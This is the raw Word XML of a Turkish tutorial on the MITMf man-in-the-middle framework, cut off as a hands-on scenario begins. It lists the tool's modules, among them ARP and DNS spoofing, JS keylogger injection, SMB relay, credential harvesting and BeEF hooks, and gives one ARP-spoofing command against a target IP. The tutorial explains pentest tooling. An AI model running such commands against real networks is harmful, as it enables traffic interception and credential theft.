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829A3" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB244C8" w14:textId="77777777" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>, gelişmiş bir Man-in-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>Middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MitM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">) saldırı çerçevesidir ve özellikle ağ trafiğini analiz etmek, yakalamak ve manipüle etmek için tasarlanmıştır. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>Ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> gibi çalışır ancak daha fazla modül ve saldırı çeşidi içerir. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>, çeşitli protokoller ve saldırı vektörleri için kapsamlı destek sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01076EDE" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">, adından da anlaşılacağı üzere bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Man-in-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00440B44">
        <w:t>’tür</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>Pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> ve güvenlik araştırmacılarının hedef ağlarda, istemciler ile sunucular arasındaki veri trafiğini yakalamak, analiz etmek ve hatta manipüle etmek için kullandığı güçlü ve modüler bir saldırı aracıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A83BEBF" w14:textId="5B399D58" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>Ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> gibi temel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MitM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> araçlarından farklı olarak, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> çok daha fazla özelliği barındırır. Özellikle Python tabanlı mimarisi sayesinde eklentiler (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">) ve modüller kolaylıkla entegre edilebilir. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">, bir saldırı zincirinin birçok adımını tek bir arayüzde birleştirebilir: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>spoofing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>sniffing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>inject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>credential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>harvesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> ve daha fazlası.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B8479" w14:textId="4905470E" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="421A3CB7" wp14:editId="35EF79C0">
            <wp:extent cx="5760720" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19232336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33673" name="Resim 192323367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F8B76" w14:textId="3B2C7965" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>NetHunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> cihazlar için </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>Facerider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> betiği üzerinden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> çalıştırılırken görülen ekran.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEE2A4D" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITMf’nin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Özellikleri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD9B133" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>spoofing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> ve DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>spoofing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> yaparak ağdaki trafik akışını kontrol etme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FDA95" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t>HTTP, HTTPS, SMB, FTP gibi protokollerde veri yakalama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75212C90" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t>JavaScript enjeksiyonu, kimlik avı sayfaları oluşturma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B7977C" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t>Kablosuz ağlarda saldırı ve sızma testleri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B3D99" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t>Çoklu modül yapısı ile esnek ve özelleştirilebilir saldırı senaryoları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168891DA" w14:textId="7967D286" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:t>Python tabanlı, açık kaynaklı ve geliştirilebilir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C324B16" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITMf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kullanım Örneği</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00775507" w14:textId="77777777" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">Temel bir ARP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>spoofing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> saldırısı başlatmak için:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600B28B" w14:textId="5807BB6E" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mitmf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --arp --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>spoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>gateway</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1 --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C8B02E" w14:textId="5ED86E15" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:r w:rsidRPr="00440B44">
        <w:t>Bu komut, belirtilen ağ geçidi ve hedef IP adresi arasında trafik ele geçirmeye çalışır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D8173E" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITMf’nin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Temel Bileşenleri ve Modülleri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0079E5" w14:textId="77777777" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>MITMf'nin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve"> başarısını sağlayan şey, çok sayıda modül ve entegrasyonu desteklemesidir. Bunlardan bazıları şunlardır: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6536"/>
      </w:tblGrid>
      <w:tr w:rsidR="00440B44" w:rsidRPr="00440B44" w14:paraId="3447E2B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EC673" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Modül</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25CFE9C5" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Açıklama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00440B44" w:rsidRPr="00440B44" w14:paraId="549996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055A6" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">ARP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spoofing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2A7BC" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:t>Ağdaki istemcilerin yönlendirmesini manipüle ederek trafiği araya alır.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00440B44" w:rsidRPr="00440B44" w14:paraId="19FE30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B2B8F" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">DNS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Spoofing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2CD63" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:t>Hedefin domain sorgularına sahte IP adresi yanıtı gönderir.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00440B44" w:rsidRPr="00440B44" w14:paraId="1600CD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6AA8A" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Inject</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> JS/HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE958CE" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:t xml:space="preserve">HTTP trafiğine JavaScript veya HTML kodu enjekte eder (örneğin </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:t>keylogger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00440B44" w:rsidRPr="00440B44" w14:paraId="7E9375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5CBB" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SMB </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Relay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C73D9D" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:t>Windows ağlarında kimlik bilgisi ele geçirme ve yetki yükseltme saldırıları.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00440B44" w:rsidRPr="00440B44" w14:paraId="2186D4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E0BFF" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Credential</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Harvesting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F3026" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:t xml:space="preserve">HTTP </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:t>basic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:t>auth</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:t>, POST formları, FTP gibi çeşitli yerlerden şifre toplar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00440B44" w:rsidRPr="00440B44" w14:paraId="646524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9FDDD" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>BeEF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr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14:paraId="4AACDB48" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:t xml:space="preserve">XSS açığı olan sayfalarda otomatik olarak </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:t>BeEF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:t>hook'u</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:t xml:space="preserve"> enjekte eder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00440B44" w:rsidRPr="00440B44" w14:paraId="550A5B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1AB88" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Responder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00440B44">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Entegrasyonu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="678E3168" w14:textId="77777777" w:rsidR="00440B44" w:rsidRPr="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
            <w:r w:rsidRPr="00440B44">
              <w:t>Ağ hizmetlerini taklit ederek şifre toplama veya kimlik doğrulama yakalama.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03403B3B" w14:textId="77777777" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44"/>
    <w:p w14:paraId="21068222" w14:textId="65FB075B" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00440B44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uygulamalı Kullanım Senaryosu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A15F8D6" w14:textId="4376CED6" w:rsidR="00440B44" w:rsidRDefault="00440B44" w:rsidP="00440B44">
      <w:r w:rsidRPr="00440B44">
        <w:t xml:space="preserve">Aşağıda örnek bir ARP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00440B44">
        <w:t>spoofing</w:t>
      </w:r>
